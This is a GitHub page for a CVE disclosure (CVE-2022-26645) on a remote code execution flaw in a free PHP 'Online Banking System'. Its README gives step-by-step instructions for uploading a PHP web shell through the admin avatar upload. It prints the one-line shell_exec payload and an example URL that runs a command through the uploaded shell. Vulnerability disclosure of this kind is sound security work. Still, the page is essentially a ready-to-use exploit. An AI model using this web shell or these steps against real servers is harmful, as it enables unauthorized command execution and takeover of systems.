Headline
CVE-2022-26645: CVE/CVE-2022-26645 at main · erik-451/CVE
A remote code execution (RCE) vulnerability in Online Banking System Protect v1.0 allows attackers to execute arbitrary code via a crafted PHP file uploaded through the Upload Image function.
main
Switch branches/tags
CVE/CVE-2022-26645/
Go to file
CVE/CVE-2022-26645/
Latest commit
erik-451 Create README.md
9b75638
Mar 29, 2022
Create README.md
9b75638
Git stats
- History
Files
Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
. .
README.md
Create README.md
Mar 29, 2022
Tittle: Online Banking System RCE Author: (Erik451) Vendor Homepage: https://www.sourcecodester.com/ Software Link: https://www.sourcecodester.com/php/14868/banking-system-using-php-free-source-code.html Version: OBS 1.0 CVE: CVE-2022-26645 Steps to reproduce:
README.md
Tittle: Online Banking System RCE****Author: (Erik451)****Vendor Homepage: https://www.sourcecodester.com/****Software Link: https://www.sourcecodester.com/php/14868/banking-system-using-php-free-source-code.html****Version: OBS 1.0
- Description: Potential RCE and XSS via file upload. A user can use the upload functionality to gain access to the server crafting php code.
Steps to reproduce:
- 1- Go to http://web.com/admin/?page=user
- 2- Modify your avatar profile and upload your php code.
Payload used: <?php echo shell_exec($_GET['shell']);?>
- 3- We can see the url of the uploaded file clicking on the image zone.
- 4- Going to that url we will execute the code.
http://<ip_server>/uploads/1648559940_shell.php?shell=id 